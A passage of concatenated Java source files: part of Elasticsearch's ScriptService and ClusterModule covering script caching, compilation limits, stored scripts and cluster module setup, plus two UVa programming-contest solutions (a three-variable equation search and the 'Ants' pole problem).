* {@code script.context.*.cache_expire}, {@link ScriptService#SCRIPT_CACHE_EXPIRE_SETTING}
*/
public static class ContextSettings {
public final Settings settings;
public final boolean useContextSet;
public final boolean isGeneralCompilationRateSet;
public final ScriptCache.CompilationRate generalCompilationRate;
public final List<String> compilationContexts;
public final List<String> sizeContexts;
public final List<String> expireContexts;
public ContextSettings(Settings settings, Set<String> contexts) {
this.settings = settings;
generalCompilationRate = SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings);
useContextSet = generalCompilationRate.equals(USE_CONTEXT_RATE_VALUE);
isGeneralCompilationRateSet = SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.exists(settings);
compilationContexts = getContexts(SCRIPT_MAX_COMPILATIONS_RATE_SETTING, settings, contexts);
sizeContexts = getContexts(SCRIPT_CACHE_SIZE_SETTING, settings, contexts);
expireContexts = getContexts(SCRIPT_CACHE_EXPIRE_SETTING, settings, contexts);
}
public ContextSettings(Settings settings) {
this(settings, Collections.emptySet());
}
protected static List<String> getContexts(Setting.AffixSetting<?> setting, Settings settings, Set<String> contexts) {
List<String> contextSettings = new ArrayList<>();
for (String context : setting.getAsMap(settings).keySet()) {
if (contexts.isEmpty() == false && contexts.contains(context) == false) {
String settingKey = setting.getConcreteSettingForNamespace(context).getKey();
throw new IllegalArgumentException("Context [" + context + "] doesn't exist for setting [" + settingKey + "]");
}
contextSettings.add(context);
}
contextSettings.sort(Comparator.naturalOrder());
return contextSettings;
}
/** Are there any context specific settings */
public boolean hasContextSettings() {
return compilationContexts.isEmpty() == false || expireContexts.isEmpty() == false || sizeContexts.isEmpty() == false;
}
/** deprecation message for implicitly using the context cache */
public String deprecationMessage() {
// Implicitly using the script context cache is deprecated, remove the following deprecated settings to use the script general
// cache.
if (hasContextSettings() == false) {
return "";
}
List<String> settingsKeys = new ArrayList<>();
settingsKeys.addAll(fullKeys(SCRIPT_MAX_COMPILATIONS_RATE_SETTING, compilationContexts));
settingsKeys.addAll(fullKeys(SCRIPT_CACHE_SIZE_SETTING, sizeContexts));
settingsKeys.addAll(fullKeys(SCRIPT_CACHE_EXPIRE_SETTING, expireContexts));
settingsKeys.sort(Comparator.naturalOrder());
return "Implicitly using the script context cache is deprecated, remove settings "
+ "["
+ String.join(", ", settingsKeys)
+ "] to use the script general cache.";
}
/** the context specific max compilation keys */
public List<String> contextCompilationKeys() {
return fullKeys(SCRIPT_MAX_COMPILATIONS_RATE_SETTING, compilationContexts);
}
/** the full keys for the contexts in the context affix setting */
protected static List<String> fullKeys(Setting.AffixSetting<?> affix, List<String> contexts) {
return contexts.stream().map(ctx -> affix.getConcreteSettingForNamespace(ctx).getKey()).toList();
}
/**
* Should the context cache be used? This is true if "use-context" is set explicitly or implicitly, see above for implicit
* definition.
*/
public boolean useContextCache() {
return useContextSet || implicitContextCache();
}
/**
* Implicitly use the script context cache. False if context cache is explicitly used as well as context cache is unused.
*/
public boolean implicitContextCache() {
return useContextSet == false && hasContextSettings() && isGeneralCompilationRateSet == false;
}
/**
* Is the set of settings incompatible? This is the case if:
* 1) {@code script.max_compilations_rate}, {@link ScriptService#SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING} is set but not
* set to "use-context".
* 2) Any of the context cache family of settings is set.
*/
public boolean incompatibleSettings() {
return useContextSet == false && hasContextSettings() && isGeneralCompilationRateSet;
}
/**
* All context specific settings
*/
public List<String> contextSettings() {
List<String> contextSettings = new ArrayList<>(fullKeys(SCRIPT_MAX_COMPILATIONS_RATE_SETTING, compilationContexts));
contextSettings.addAll(fullKeys(SCRIPT_CACHE_SIZE_SETTING, sizeContexts));
contextSettings.addAll(fullKeys(SCRIPT_CACHE_EXPIRE_SETTING, expireContexts));
return contextSettings;
}
/**
* Error message if there are incompatible settings.
*/
public String incompatibleSettingsMessage() {
if (incompatibleSettings() == false) {
return "";
}
List<String> incompatible = contextSettings();
return "Context cache settings ["
+ String.join(",", incompatible)
+ "] are incompatible with ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "] set to non-default value ["
+ generalCompilationRate
+ "]."
+ " Either remove the incompatible settings (recommended) or set ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "] to ["
+ USE_CONTEXT_RATE_KEY
+ "] to use per-context settings";
}
}
@Override
public void close() throws IOException {
IOUtils.close(engines.values());
}
/**
* @return an unmodifiable {@link Map} of available script context names to {@link ScriptContext}s
*/
public Map<String, ScriptContext<?>> getScriptContexts() {
return contexts;
}
private ScriptEngine getEngine(String lang) {
ScriptEngine scriptEngine = engines.get(lang);
if (scriptEngine == null) {
throw new IllegalArgumentException("script_lang not supported [" + lang + "]");
}
return scriptEngine;
}
/**
* Changes the maximum number of bytes a script's source is allowed to have.
* @param newMaxSizeInBytes The new maximum number of bytes.
*/
void setMaxSizeInBytes(int newMaxSizeInBytes) {
for (Map.Entry<String, StoredScriptSource> source : getScriptsFromClusterState().entrySet()) {
if (source.getValue().getSource().getBytes(StandardCharsets.UTF_8).length > newMaxSizeInBytes) {
throw new IllegalArgumentException(
"script.max_size_in_bytes cannot be set to ["
+ newMaxSizeInBytes
+ "], "
+ "stored script ["
+ source.getKey()
+ "] exceeds the new value with a size of "
+ "["
+ source.getValue().getSource().getBytes(StandardCharsets.UTF_8).length
+ "]"
);
}
}
maxSizeInBytes = newMaxSizeInBytes;
}
/**
* Compiles a script using the given context.
*
* @return a compiled script which may be used to construct instances of a script for the given context
*/
public <FactoryType> FactoryType compile(Script script, ScriptContext<FactoryType> context) {
Objects.requireNonNull(script);
Objects.requireNonNull(context);
ScriptType type = script.getType();
String lang = script.getLang();
String idOrCode = script.getIdOrCode();
Map<String, String> options = script.getOptions();
String id = idOrCode;
if (type == ScriptType.STORED) {
// * lang and options will both be null when looking up a stored script,
// so we must get the source to retrieve them before checking if the
// context is supported
// * a stored script must be pulled from the cluster state every time in case
// the script has been updated since the last compilation
StoredScriptSource source = getScriptFromClusterState(id);
lang = source.getLang();
idOrCode = source.getSource();
options = source.getOptions();
}
ScriptEngine scriptEngine = getEngine(lang);
if (isTypeEnabled(type) == false) {
throw new IllegalArgumentException("cannot execute [" + type + "] scripts");
}
if (contexts.containsKey(context.name) == false) {
throw new IllegalArgumentException("script context [" + context.name + "] not supported");
}
if (isContextEnabled(context) == false) {
throw new IllegalArgumentException("cannot execute scripts using [" + context.name + "] context");
}
if (type == ScriptType.INLINE) {
if (idOrCode.getBytes(StandardCharsets.UTF_8).length > maxSizeInBytes) {
throw new IllegalArgumentException(
"exceeded max allowed inline script size in bytes ["
+ maxSizeInBytes
+ "] "
+ "with size ["
+ idOrCode.getBytes(StandardCharsets.UTF_8).length
+ "] for script ["
+ idOrCode
+ "]"
);
}
}
if (logger.isTraceEnabled()) {
logger.trace("compiling lang: [{}] type: [{}] script: {}", lang, type, idOrCode);
}
ScriptCache scriptCache = cacheHolder.get().get(context.name);
assert scriptCache != null : "script context [" + context.name + "] has no script cache";
return scriptCache.compile(context, scriptEngine, id, idOrCode, type, options);
}
public boolean isLangSupported(String lang) {
Objects.requireNonNull(lang);
return engines.containsKey(lang);
}
public boolean isTypeEnabled(ScriptType scriptType) {
return typesAllowed == null || typesAllowed.contains(scriptType.getName());
}
public boolean isContextEnabled(ScriptContext<?> scriptContext) {
return contextsAllowed == null || contextsAllowed.contains(scriptContext.name);
}
public boolean isAnyContextEnabled() {
return contextsAllowed == null || contextsAllowed.isEmpty() == false;
}
Map<String, StoredScriptSource> getScriptsFromClusterState() {
if (clusterState == null) {
return Collections.emptyMap();
}
ScriptMetadata scriptMetadata = clusterState.metadata().custom(ScriptMetadata.TYPE);
if (scriptMetadata == null) {
return Collections.emptyMap();
}
return scriptMetadata.getStoredScripts();
}
protected StoredScriptSource getScriptFromClusterState(String id) {
ScriptMetadata scriptMetadata = clusterState.metadata().custom(ScriptMetadata.TYPE);
if (scriptMetadata == null) {
throw new ResourceNotFoundException("unable to find script [" + id + "] in cluster state");
}
StoredScriptSource source = scriptMetadata.getStoredScript(id);
if (source == null) {
throw new ResourceNotFoundException("unable to find script [" + id + "] in cluster state");
}
return source;
}
public void putStoredScript(
ClusterService clusterService,
PutStoredScriptRequest request,
ActionListener<AcknowledgedResponse> listener
) {
if (request.content().length() > maxSizeInBytes) {
throw new IllegalArgumentException(
"exceeded max allowed stored script size in bytes ["
+ maxSizeInBytes
+ "] with size ["
+ request.content().length()
+ "] for script ["
+ request.id()
+ "]"
);
}
StoredScriptSource source = request.source();
if (isLangSupported(source.getLang()) == false) {
throw new IllegalArgumentException("unable to put stored script with unsupported lang [" + source.getLang() + "]");
}
try {
ScriptEngine scriptEngine = getEngine(source.getLang());
if (isTypeEnabled(ScriptType.STORED) == false) {
throw new IllegalArgumentException(
"cannot put [" + ScriptType.STORED + "] script, [" + ScriptType.STORED + "] scripts are not enabled"
);
} else if (isAnyContextEnabled() == false) {
throw new IllegalArgumentException("cannot put [" + ScriptType.STORED + "] script, no script contexts are enabled");
} else if (request.context() != null) {
ScriptContext<?> context = contexts.get(request.context());
if (context == null) {
throw new IllegalArgumentException("Unknown context [" + request.context() + "]");
}
if (context.allowStoredScript == false) {
throw new IllegalArgumentException("cannot store a script for context [" + request.context() + "]");
}
scriptEngine.compile(request.id(), source.getSource(), context, Collections.emptyMap());
}
} catch (ScriptException good) {
throw good;
} catch (Exception exception) {
throw new IllegalArgumentException("failed to parse/compile stored script [" + request.id() + "]", exception);
}
submitUnbatchedTask(clusterService, "put-script-" + request.id(), new AckedClusterStateUpdateTask(request, listener) {
@Override
public ClusterState execute(ClusterState currentState) {
ScriptMetadata smd = currentState.metadata().custom(ScriptMetadata.TYPE);
smd = ScriptMetadata.putStoredScript(smd, request.id(), source);
Metadata.Builder mdb = Metadata.builder(currentState.getMetadata()).putCustom(ScriptMetadata.TYPE, smd);
return ClusterState.builder(currentState).metadata(mdb).build();
}
});
}
public static void deleteStoredScript(
ClusterService clusterService,
DeleteStoredScriptRequest request,
ActionListener<AcknowledgedResponse> listener
) {
submitUnbatchedTask(clusterService, "delete-script-" + request.id(), new AckedClusterStateUpdateTask(request, listener) {
@Override
public ClusterState execute(ClusterState currentState) {
ScriptMetadata smd = currentState.metadata().custom(ScriptMetadata.TYPE);
smd = ScriptMetadata.deleteStoredScript(smd, request.id());
Metadata.Builder mdb = Metadata.builder(currentState.getMetadata()).putCustom(ScriptMetadata.TYPE, smd);
return ClusterState.builder(currentState).metadata(mdb).build();
}
});
}
@SuppressForbidden(reason = "legacy usage of unbatched task") // TODO add support for batching here
private static void submitUnbatchedTask(
ClusterService clusterService,
@SuppressWarnings("SameParameterValue") String source,
ClusterStateUpdateTask task
) {
clusterService.submitUnbatchedStateUpdateTask(source, task);
}
public static StoredScriptSource getStoredScript(ClusterState state, GetStoredScriptRequest request) {
ScriptMetadata scriptMetadata = state.metadata().custom(ScriptMetadata.TYPE);
if (scriptMetadata != null) {
return scriptMetadata.getStoredScript(request.id());
} else {
return null;
}
}
public Set<ScriptContextInfo> getContextInfos() {
Set<ScriptContextInfo> infos = Sets.newHashSetWithExpectedSize(contexts.size());
for (ScriptContext<?> context : contexts.values()) {
infos.add(new ScriptContextInfo(context.name, context.instanceClazz));
}
return infos;
}
public ScriptLanguagesInfo getScriptLanguages() {
Set<String> types = typesAllowed;
if (types == null) {
types = new HashSet<>();
for (ScriptType type : ScriptType.values()) {
types.add(type.getName());
}
}
final Set<String> contexts = contextsAllowed != null ? contextsAllowed : this.contexts.keySet();
Map<String, Set<String>> languageContexts = new HashMap<>();
engines.forEach(
(key, value) -> languageContexts.put(
key,
value.getSupportedContexts().stream().map(c -> c.name).filter(contexts::contains).collect(Collectors.toSet())
)
);
return new ScriptLanguagesInfo(types, languageContexts);
}
public ScriptStats stats() {
return cacheHolder.get().stats();
}
public ScriptCacheStats cacheStats() {
return cacheHolder.get().cacheStats();
}
@Override
public void applyClusterState(ClusterChangedEvent event) {
clusterState = event.state();
}
void setCacheHolder(Settings settings) {
CacheHolder current = cacheHolder.get();
ContextSettings contextSettings = new ContextSettings(settings, contexts.keySet());
if (current == null) {
if (contextSettings.useContextCache()) {
cacheHolder.set(contextCacheHolder(settings));
} else {
cacheHolder.set(generalCacheHolder(settings));
}
return;
}
// Update
if (contextSettings.useContextCache()) {
if (current.general != null) {
// Flipping to context specific
cacheHolder.set(contextCacheHolder(settings));
}
} else if (current.general == null) {
// Flipping to general
cacheHolder.set(generalCacheHolder(settings));
} else if (current.general.rate.equals(SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings)) == false
|| current.general.cacheExpire.equals(SCRIPT_GENERAL_CACHE_EXPIRE_SETTING.get(settings)) == false
|| current.general.cacheSize != SCRIPT_GENERAL_CACHE_SIZE_SETTING.get(settings)) {
// General compilation rate, cache expiration or cache size changed
cacheHolder.set(generalCacheHolder(settings));
}
}
CacheHolder generalCacheHolder(Settings settings) {
ScriptCache.CompilationRate rate = SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings);
if (SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.get(settings) || compilationLimitsEnabled() == false) {
rate = SCRIPT_COMPILATION_RATE_ZERO;
}
return new CacheHolder(
SCRIPT_GENERAL_CACHE_SIZE_SETTING.get(settings),
SCRIPT_GENERAL_CACHE_EXPIRE_SETTING.get(settings),
rate,
SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey(),
timeProvider
);
}
CacheHolder contextCacheHolder(Settings settings) {
Map<String, ScriptCache> contextCache = Maps.newMapWithExpectedSize(contexts.size());
contexts.forEach((k, v) -> contextCache.put(k, contextCache(settings, v)));
return new CacheHolder(contextCache);
}
ScriptCache contextCache(Settings settings, ScriptContext<?> context) {
Setting<Integer> cacheSizeSetting = SCRIPT_CACHE_SIZE_SETTING.getConcreteSettingForNamespace(context.name);
int cacheSize = cacheSizeSetting.existsOrFallbackExists(settings) ? cacheSizeSetting.get(settings) : context.cacheSizeDefault;
Setting<TimeValue> cacheExpireSetting = SCRIPT_CACHE_EXPIRE_SETTING.getConcreteSettingForNamespace(context.name);
TimeValue cacheExpire = cacheExpireSetting.existsOrFallbackExists(settings)
? cacheExpireSetting.get(settings)
: context.cacheExpireDefault;
Setting<ScriptCache.CompilationRate> rateSetting = SCRIPT_MAX_COMPILATIONS_RATE_SETTING.getConcreteSettingForNamespace(
context.name
);
ScriptCache.CompilationRate rate;
if (SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.get(settings)
|| compilationLimitsEnabled() == false
|| context.compilationRateLimited == false) {
rate = SCRIPT_COMPILATION_RATE_ZERO;
} else if (rateSetting.existsOrFallbackExists(settings)) {
rate = rateSetting.get(settings);
} else {
rate = new ScriptCache.CompilationRate(ScriptContext.DEFAULT_COMPILATION_RATE_LIMIT);
}
return new ScriptCache(cacheSize, cacheExpire, rate, rateSetting.getKey(), timeProvider);
}
/**
* Container for the ScriptCache(s). This class operates in two modes:
* 1) general mode, if the general script cache is configured. There are no context caches in this case.
* 2) context mode, if the context script cache is configured. There is no general cache in this case.
*/
static class CacheHolder {
final ScriptCache general;
final Map<String, AtomicReference<ScriptCache>> contextCache;
CacheHolder(
int cacheMaxSize,
TimeValue cacheExpire,
ScriptCache.CompilationRate maxCompilationRate,
String contextRateSetting,
LongSupplier timeProvider
) {
contextCache = null;
general = new ScriptCache(cacheMaxSize, cacheExpire, maxCompilationRate, contextRateSetting, timeProvider);
}
CacheHolder(Map<String, ScriptCache> context) {
Map<String, AtomicReference<ScriptCache>> refs = Maps.newMapWithExpectedSize(context.size());
context.forEach((k, v) -> refs.put(k, new AtomicReference<>(v)));
contextCache = Collections.unmodifiableMap(refs);
general = null;
}
/**
* get the cache appropriate for the context. If in general mode, return the general cache. Otherwise return the ScriptCache for
* the given context. Returns null in context mode if the requested context does not exist.
*/
ScriptCache get(String context) {
if (general != null) {
return general;
}
AtomicReference<ScriptCache> ref = contextCache.get(context);
if (ref == null) {
return null;
}
return ref.get();
}
ScriptStats stats() {
if (general != null) {
return general.stats();
}
List<ScriptContextStats> contextStats = new ArrayList<>(contextCache.size());
for (Map.Entry<String, AtomicReference<ScriptCache>> entry : contextCache.entrySet()) {
ScriptCache cache = entry.getValue().get();
contextStats.add(cache.stats(entry.getKey()));
}
return ScriptStats.read(contextStats);
}
ScriptCacheStats cacheStats() {
if (general != null) {
return new ScriptCacheStats(general.stats());
}
Map<String, ScriptStats> context = Maps.newMapWithExpectedSize(contextCache.size());
for (String name : contextCache.keySet()) {
context.put(name, contextCache.get(name).get().stats());
}
return new ScriptCacheStats(context);
}
/**
* Update a single context cache if we're in the context cache mode otherwise no-op.
*/
void set(String name, ScriptCache cache) {
if (general != null) {
return;
}
AtomicReference<ScriptCache> ref = contextCache.get(name);
assert ref != null : "expected script cache to exist for context [" + name + "]";
ScriptCache oldCache = ref.get();
assert oldCache != null : "expected script cache to be non-null for context [" + name + "]";
ref.set(cache);
logger.debug("Replaced context [" + name + "] with new settings");
}
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/script/ScriptService.java |
1,156 | /**
* Let us look at a boring mathematics problem. :-) We have three different
* integers, x, y and z, which satisfy the following three relations: • x + y +
* z = A • xyz = B • x 2 + y 2 + z 2 = C You are asked to write a program that
* solves for x, y and z for given values of A, B and C. Input The first line of
* the input file gives the number of test cases N (N < 20). Each of the
* following N lines gives the values of A, B and C (1 ≤ A, B, C ≤ 10000).
* Output For each test case, output the corresponding values of x, y and z. If
* there are many possible answers, choose the one with the least value of x. If
* there is a tie, output the one with the least value of y. If there is no
* solution, output the line ‘No solution.’ instead. Sample Input 2 1 2 3 6 6 14
* Sample Output No solution. 1 2 3
*/
// https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=2612
import java.util.Scanner;
public class SolveEquation {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
int numberOfTestCases = input.nextInt();
while (numberOfTestCases != 0) {
int A = input.nextInt();
int B = input.nextInt();
int C = input.nextInt();
boolean hasSolution = false;
for (int x = -22; x <= 22 && !hasSolution; x++) {
if (x * x <= C) {
for (int y = -100; y <= 100 && !hasSolution; y++) {
if (x != y && y * y <= C && (x * x + y * y <= C)) {
int z = A - x - y;
if ((z != y && z != x && x * x + y * y + z * z == C)
&& x * y * z == B) {
hasSolution = true;
System.out.println(x + " " + y + " " + z);
}
}
}
}
}
if (!hasSolution) {
System.out.println("No solution.");
}
numberOfTestCases--;
}
}
}
| kdn251/interviews | uva/SolveEquation.java |
1,159 | // An army of ants walk on a horizontal pole of length l cm, each with a constant speed of 1 cm/s. When
// a walking ant reaches an end of the pole, it immediatelly falls off it. When two ants meet they turn
// back and start walking in opposite directions. We know the original positions of ants on the pole,
// unfortunately, we do not know the directions in which the ants are walking. Your task is to compute
// the earliest and the latest possible times needed for all ants to fall off the pole.
// Input
// The first line of input contains one integer giving the number of cases that follow. The data for each
// case start with two integer numbers: the length of the pole (in cm) and n, the number of ants residing
// on the pole. These two numbers are followed by n integers giving the position of each ant on the pole
// as the distance measured from the left end of the pole, in no particular order. All input integers are
// not bigger than 1000000 and they are separated by whitespace.
// Output
// For each case of input, output two numbers separated by a single space. The first number is the earliest
// possible time when all ants fall off the pole (if the directions of their walks are chosen appropriately)
// and the second number is the latest possible such time.
// Sample Input
// 2
// 10 3
// 2 6 7
// 214 7
// 11 12 7 13 176 23 191
// Sample Output
// 4 8
// 38 207
import java.util.Scanner;
/**
* Created by kdn251 on 2/22/17.
*/
public class Ants {
public static void main(String args[]) throws Exception {
//initialize buffered reader
Scanner sc = new Scanner(System.in);
//initialize test cases
int testCases = sc.nextInt();
//declare current ant
int currentAnt;
while(testCases > 0) {
//initialize length of rod and number of ants
int length = sc.nextInt();
int numberOfAnts = sc.nextInt();
//initialize min and max to zero
int min = 0;
int max = 0;
//iterate while there are still remaining ants to process
while(numberOfAnts > 0) {
//read in current ant
currentAnt = sc.nextInt();
//calculate whether ant is closer to left side of rod or right side of rod
currentAnt = currentAnt < length - currentAnt ? currentAnt : length - currentAnt;
//update minimum time to most restrictive ant minimum time
if(currentAnt > min) {
min = currentAnt;
}
//update maximum time to most restrictive ant maximum time
if(length - currentAnt > max) {
max = length - currentAnt;
}
//decrement number of ants remaining
numberOfAnts--;
}
//print min and max of current test case
System.out.println(min + " " + max);
//decrement number of test cases remaining
testCases--;
}
}
}
//source: https://github.com/morris821028/UVa/blob/master/volume107/10714%20-%20Ants.cpp | kdn251/interviews | uva/Ants.java |
1,160 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.cluster;
import org.elasticsearch.action.admin.indices.rollover.MetadataRolloverService;
import org.elasticsearch.cluster.action.index.MappingUpdatedAction;
import org.elasticsearch.cluster.action.shard.ShardStateAction;
import org.elasticsearch.cluster.metadata.ComponentTemplateMetadata;
import org.elasticsearch.cluster.metadata.ComposableIndexTemplateMetadata;
import org.elasticsearch.cluster.metadata.DataStreamMetadata;
import org.elasticsearch.cluster.metadata.DesiredNodesMetadata;
import org.elasticsearch.cluster.metadata.IndexGraveyard;
import org.elasticsearch.cluster.metadata.IndexNameExpressionResolver;
import org.elasticsearch.cluster.metadata.Metadata;
import org.elasticsearch.cluster.metadata.MetadataDeleteIndexService;
import org.elasticsearch.cluster.metadata.MetadataIndexAliasesService;
import org.elasticsearch.cluster.metadata.MetadataIndexStateService;
import org.elasticsearch.cluster.metadata.MetadataIndexTemplateService;
import org.elasticsearch.cluster.metadata.MetadataMappingService;
import org.elasticsearch.cluster.metadata.NodesShutdownMetadata;
import org.elasticsearch.cluster.metadata.RepositoriesMetadata;
import org.elasticsearch.cluster.routing.DelayedAllocationService;
import org.elasticsearch.cluster.routing.ShardRouting;
import org.elasticsearch.cluster.routing.ShardRoutingRoleStrategy;
import org.elasticsearch.cluster.routing.allocation.AllocationService;
import org.elasticsearch.cluster.routing.allocation.AllocationService.RerouteStrategy;
import org.elasticsearch.cluster.routing.allocation.AllocationStatsService;
import org.elasticsearch.cluster.routing.allocation.ExistingShardsAllocator;
import org.elasticsearch.cluster.routing.allocation.WriteLoadForecaster;
import org.elasticsearch.cluster.routing.allocation.allocator.BalancedShardsAllocator;
import org.elasticsearch.cluster.routing.allocation.allocator.DesiredBalanceShardsAllocator;
import org.elasticsearch.cluster.routing.allocation.allocator.DesiredBalanceShardsAllocator.DesiredBalanceReconcilerAction;
import org.elasticsearch.cluster.routing.allocation.allocator.ShardsAllocator;
import org.elasticsearch.cluster.routing.allocation.decider.AllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.AllocationDeciders;
import org.elasticsearch.cluster.routing.allocation.decider.AwarenessAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ClusterRebalanceAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ConcurrentRebalanceAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.DiskThresholdDecider;
import org.elasticsearch.cluster.routing.allocation.decider.EnableAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.FilterAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.MaxRetryAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.NodeReplacementAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.NodeShutdownAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.NodeVersionAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.RebalanceOnlyWhenActiveAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ReplicaAfterPrimaryActiveAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ResizeAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.RestoreInProgressAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.SameShardAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ShardsLimitAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.SnapshotInProgressAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ThrottlingAllocationDecider;
import org.elasticsearch.cluster.service.ClusterService;
import org.elasticsearch.common.inject.AbstractModule;
import org.elasticsearch.common.io.stream.NamedWriteable;
import org.elasticsearch.common.io.stream.NamedWriteableRegistry.Entry;
import org.elasticsearch.common.io.stream.Writeable.Reader;
import org.elasticsearch.common.settings.ClusterSettings;
import org.elasticsearch.common.settings.Setting;
import org.elasticsearch.common.settings.Setting.Property;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.core.UpdateForV9;
import org.elasticsearch.gateway.GatewayAllocator;
import org.elasticsearch.health.metadata.HealthMetadataService;
import org.elasticsearch.health.node.selection.HealthNodeTaskExecutor;
import org.elasticsearch.indices.SystemIndices;
import org.elasticsearch.ingest.IngestMetadata;
import org.elasticsearch.persistent.PersistentTasksCustomMetadata;
import org.elasticsearch.persistent.PersistentTasksNodeService;
import org.elasticsearch.plugins.ClusterPlugin;
import org.elasticsearch.script.ScriptMetadata;
import org.elasticsearch.snapshots.SnapshotsInfoService;
import org.elasticsearch.tasks.Task;
import org.elasticsearch.tasks.TaskResultsService;
import org.elasticsearch.telemetry.TelemetryProvider;
import org.elasticsearch.threadpool.ThreadPool;
import org.elasticsearch.upgrades.FeatureMigrationResults;
import org.elasticsearch.xcontent.NamedXContentRegistry;
import org.elasticsearch.xcontent.ParseField;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.function.Function;
import java.util.function.Supplier;
/**
* Configures classes and services that affect the entire cluster.
*/
public class ClusterModule extends AbstractModule {
public static final String BALANCED_ALLOCATOR = "balanced";
public static final String DESIRED_BALANCE_ALLOCATOR = "desired_balance"; // default
public static final Setting<String> SHARDS_ALLOCATOR_TYPE_SETTING = new Setting<>(
"cluster.routing.allocation.type",
DESIRED_BALANCE_ALLOCATOR,
Function.identity(),
Property.NodeScope,
Property.Deprecated
);
private final ClusterService clusterService;
private final IndexNameExpressionResolver indexNameExpressionResolver;
private final AllocationDeciders allocationDeciders;
private final AllocationService allocationService;
private final List<ClusterPlugin> clusterPlugins;
private final MetadataDeleteIndexService metadataDeleteIndexService;
// pkg private for tests
final Collection<AllocationDecider> deciderList;
final ShardsAllocator shardsAllocator;
private final ShardRoutingRoleStrategy shardRoutingRoleStrategy;
private final AllocationStatsService allocationStatsService;
private final TelemetryProvider telemetryProvider;
public ClusterModule(
Settings settings,
ClusterService clusterService,
List<ClusterPlugin> clusterPlugins,
ClusterInfoService clusterInfoService,
SnapshotsInfoService snapshotsInfoService,
ThreadPool threadPool,
SystemIndices systemIndices,
WriteLoadForecaster writeLoadForecaster,
TelemetryProvider telemetryProvider
) {
this.clusterPlugins = clusterPlugins;
this.deciderList = createAllocationDeciders(settings, clusterService.getClusterSettings(), clusterPlugins);
this.allocationDeciders = new AllocationDeciders(deciderList);
this.shardsAllocator = createShardsAllocator(
settings,
clusterService.getClusterSettings(),
threadPool,
clusterPlugins,
clusterService,
this::reconcile,
writeLoadForecaster,
telemetryProvider
);
this.clusterService = clusterService;
this.indexNameExpressionResolver = new IndexNameExpressionResolver(threadPool.getThreadContext(), systemIndices);
this.shardRoutingRoleStrategy = getShardRoutingRoleStrategy(clusterPlugins);
this.allocationService = new AllocationService(
allocationDeciders,
shardsAllocator,
clusterInfoService,
snapshotsInfoService,
shardRoutingRoleStrategy
);
this.metadataDeleteIndexService = new MetadataDeleteIndexService(settings, clusterService, allocationService);
this.allocationStatsService = new AllocationStatsService(clusterService, clusterInfoService, shardsAllocator, writeLoadForecaster);
this.telemetryProvider = telemetryProvider;
}
static ShardRoutingRoleStrategy getShardRoutingRoleStrategy(List<ClusterPlugin> clusterPlugins) {
final var strategies = clusterPlugins.stream().map(ClusterPlugin::getShardRoutingRoleStrategy).filter(Objects::nonNull).toList();
return switch (strategies.size()) {
case 0 -> new ShardRoutingRoleStrategy() {
// NOTE: this is deliberately an anonymous class to avoid any possibility of using this DEFAULT-only strategy when a plugin
// has injected a different strategy.
@Override
public ShardRouting.Role newReplicaRole() {
return ShardRouting.Role.DEFAULT;
}
@Override
public ShardRouting.Role newEmptyRole(int copyIndex) {
return ShardRouting.Role.DEFAULT;
}
};
case 1 -> strategies.get(0);
default -> throw new IllegalArgumentException("multiple plugins define shard role strategies, which is not permitted");
};
}
private ClusterState reconcile(ClusterState clusterState, RerouteStrategy rerouteStrategy) {
return allocationService.executeWithRoutingAllocation(clusterState, "reconcile-desired-balance", rerouteStrategy);
}
public static List<Entry> getNamedWriteables() {
List<Entry> entries = new ArrayList<>();
// Cluster State
registerClusterCustom(entries, SnapshotsInProgress.TYPE, SnapshotsInProgress::new, SnapshotsInProgress::readDiffFrom);
registerClusterCustom(entries, RestoreInProgress.TYPE, RestoreInProgress::new, RestoreInProgress::readDiffFrom);
registerClusterCustom(
entries,
SnapshotDeletionsInProgress.TYPE,
SnapshotDeletionsInProgress::new,
SnapshotDeletionsInProgress::readDiffFrom
);
registerClusterCustom(
entries,
RepositoryCleanupInProgress.TYPE,
RepositoryCleanupInProgress::new,
RepositoryCleanupInProgress::readDiffFrom
);
// Metadata
registerMetadataCustom(entries, RepositoriesMetadata.TYPE, RepositoriesMetadata::new, RepositoriesMetadata::readDiffFrom);
registerMetadataCustom(entries, IngestMetadata.TYPE, IngestMetadata::new, IngestMetadata::readDiffFrom);
